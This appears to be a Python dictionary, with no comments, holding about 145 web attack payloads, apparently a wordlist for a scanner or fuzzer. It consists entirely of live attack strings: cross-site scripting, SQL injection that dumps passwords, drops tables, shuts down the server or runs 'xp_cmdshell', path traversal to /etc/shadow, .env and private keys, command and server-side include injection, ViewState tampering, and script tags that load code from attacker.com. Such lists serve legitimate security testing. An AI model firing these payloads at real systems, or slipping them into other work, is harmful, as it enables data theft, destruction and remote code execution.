vwtags = {
    1: "%3C%",
    2: "<script>alert(1)</script>",
    3: "../../../../../../../../etc/passwd%00",
    4: "%3Cscript%3Ealert(document.cookie)%3C/script%3E",
    5: "javascript:alert(1)",
    6: "a=alert(1)//",
    7: "@Page Language=\"C#\" AutoEventWireup=\"true\" CodeFile=\"Default.aspx.cs\" Inherits=\"_Default\"",
    8: "<% @Page Language=\"C#\" %>",
    9: "1 OR 1=1",
    10: "<% Response.Write(Request.QueryString[\"vulnerable\"]); %>",
    11: "<%@ Page Language=\"VB\" Debug=\"True\" Trace=\"True\" %>",
    12: "%3Cinput name%3D%22__VIEWSTATE%22 value%3D%22tamperedViewStateHere%22 /%3E",
    13: "../../../../windows/system32/cmd.exe?",
    14: "../../../../WEB-INF/web.xml",
    15: "%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fwindows%2Fsystem32%2Fcmd%2Eexe%3F",
    16: "|0%0A/bin/cat /etc/passwd",
    17: "';--",
    18: "'--",
    19: "' OR 1=1--",
    20: "|ping -n 10 localhost||",
    21: "PING '8.8.8.8'",
    22: "1;DROP TABLE users",
    23: "><img src=x onerror=alert(document.domain)>",
    24: "<iframe src=\"http://malicious.site.com/exploit.html\"></iframe>",
    25: "<input name=\"__VIEWSTATE\" value=\"encodedViewStateHere\" />",
    26: "%3Cinput name%3D%22__VIEWSTATE%22 value%3D%22tamperedViewStateHere%22 /%3E",
    27: "<%# ViewState[\"__VIEWSTATE\"] = \"tamperedData\" %>",
    28: "<form action=\"/vulnerable-page\" method=\"POST\"><input name=\"__VIEWSTATE\" value=\"tampered\" /></form>",
    29: "../vulnerable-file",
    30: "../../../../bin/cmd.exe",
    31: "'; EXEC xp_cmdshell('ping 127.0.0.1');--",
    32: "' or ''='",
    33: "' union select null, @@version--",
    34: "';shutdown--",
    35: "><script>alert(1)</script>",
    36: "javascript:void(alert('XSS'))",
    37: "file://C:/Windows/System32/cmd.exe",
    38: "../../../../bin/bash",
    39: "file://C:/path/to/application.config",
    40: "' OR 1=1#",
    41: "http://vulnerable.site.com/page?param=../../etc/shadow",
    42: "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
    43: "'; WAITFOR DELAY '00:00:10';--",
    44: "' OR SLEEP(5)=0--",
    45: "' AND 1=2 UNION ALL SELECT @@version, NULL#",
    46: "SELECT user FROM dual WHERE 1=1",
    47: "javascript:alert(123)",
    48: "';shutdown--",
    49: "../../../../etc/passwd%00",
    50: "null OR 1=1--",
    51: "' or 1=1--",
    52: "</textarea><script>alert(1)</script>",
    53: "' UNION SELECT 1, @@version#",
    56: "<div style=\"background:url(javascript:alert('XSS'))\">",
    57: "' exec xp_cmdshell('ipconfig /all') --",
    58: "<script src=\"http://attacker.com/exploit.js\"></script>",
    59: "#include \"/etc/passwd\"",
    60: "foo' AND 'a'='a'",
    61: "' UNION SELECT NULL,NULL--",
    62: "' UNION SELECT 1--",
    63: "javascript:alert(123)",
    64: "' AND '1'='1'",
    65: "../../../../windows/system32/cmd.exe",
    66: "|echo vulnerable|",
    67: "' or 1=1 --",
    68: "><script>alert(3)</script>",
    69: "' DROP TABLE users --",
    70: "OR 1=1 --",
    71: "../windows/win.ini",
    72: "'/><script>alert('XSS')</script>",
    73: "<img src=\"javascript:alert('XSS')\">",
    74: "<object data=\"http://malicious.com/exploit.swf\"></object>",
    75: "file:///c:/windows/system32/calc.exe",
    76: "<input name=\"__VIEWSTATE\" value=\"tamperedStateData\" />",
    77: "../windows/system32/msconfig",
    78: "' AND 1=1",
    79: "../../../../windows/system32/cmd.exe%00",
    80: "<input type=\"hidden\" name=\"__VIEWSTATE\" value=\"tamperedDataHere\" />",
    81: "\"><iframe src=\"javascript:alert(4)\"></iframe>",
    82: "'\><script>alert('XSS')</script>",
    83: "' OR 1=1#",
    84: "<script>alert(1)</script>",
    85: "' union all select null, password from users--",
    86: "<!--#exec cmd=\"/bin/bash\" -->",
    87: "../../../../win.ini",
    88: "' UNION ALL SELECT name, pass FROM users--",
    89: "<script>document.write(document.cookie)</script>",
    90: "'; DROP TABLE users;--",
    91: "../../../../boot.ini",
    92: "<% Response.Write(\"Testing\"); %>",
    93: "<%= ViewState[\"__VIEWSTATE\"] = \"tampered\" %>",
    94: "../../../../var/www/html/admin/config.php",
    95: "<% Response.Redirect(\"/error.aspx\"); %>",
    96: "' OR 'x'='x",
    97: "<IMG SRC=\"javascript:alert('XSS')\">",
    98: "../../../../system32/netcat.exe",
    99: "1 UNION SELECT * FROM users--",
    100: "../../../../path/to/secret/config.yaml",
    101: "<% Response.WriteFile(\"/etc/passwd\"); %>",
    102: "../../../../WEB-INF/config.xml",
    103: "../app_data/config.xml",
    104: "' UNION SELECT password FROM admin_users--",
    105: "<script>alert(5)</script>",
    106: "UNION SELECT 1, 2, 3--",
    107: "<%# Response.WriteFile(\"/etc/passwd\"); %>",
    108: "'); DROP TABLE viewstate_logs;--",
    109: "../../../../../../.git/config",
    110: "<script>window.open('http://attacker.com');</script>",
    111: "'>alert(1)",
    112: "../private/settings.ini",
    113: "' AND SLEEP(10)--",
    114: "' DROP DATABASE--",
    115: "<%# Response.Write(\"Hello, world\"); %>",
    116: "<!--#include file=\"/etc/passwd\"-->",
    117: "../../../../../../../etc/shadow",
    118: "file://C:/windows/system32/secret.conf",
    119: "../../../../../../../private-key.pem",
    120: "<input name=\"__EVENTVALIDATION\" value=\"tamperedValue\" />",
    121: "../path/to/database.sqlite",
    122: "file://C:/path/to/admin.conf",
    123: "javascript:alert(6)",
    124: "1 UNION ALL SELECT password FROM users--",
    125: "<input name=\"__VIEWSTATEGENERATOR\" value=\"tamperedGenerator\" />",
    126: "' OR 1=1 LIMIT 1--",
    127: "../../../../app_data/admin.sqlite",
    128: "../../../../.env",
    129: "../../../../config/secrets.yml",
    130: "' OR EXISTS (SELECT 1)--",
    131: "<input type='hidden' name='__VIEWSTATE' value='dummyValue' />",
    132: "<input type='hidden' name='__VIEWSTATE' value='0' />",
    133: "<input type='hidden' name='__VIEWSTATE' value='YQ==' />",
    134: "<input type='hidden' name='__VIEWSTATE' value='dGVzdA==' />",
    135: "eval(unescape('%63%6F%6E%73%6F%6C%65%2E%6C%6F%67%28%27%77%61%72%6E%69%6E%67%27%29'))",
    136: "<input type='hidden' name='__VIEWSTATE' value='0000000000000000000000000000000000000000000000000000000000000000' />",
    137: "<% Response.Write(ViewState[\"__VIEWSTATE\"]); %>",
    138: "CONCAT(SELECT username FROM users LIMIT 1)",
    139: "<input type='hidden' name='__VIEWSTATE' value='TmFtZQ==' />",
    140: "' UNION SELECT null,null,null FROM users--",
    141: "<% Response.Redirect(\"http://malicious.com\"); %>",
    142: "<script>document.body.innerHTML += '<script src=\"http://malicious.com/script.js\"></script>';</script>",
    143: "UNION SELECT user, pass FROM users",
    144: "' OR 1=1;--",
    145: "<input type='hidden' name='__VIEWSTATE' value='eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9...' />",
    146: "<%= Response.Write(Request.QueryString[\"data\"]) %>",
    147: "' AND '1'='1' LIMIT 1--",

}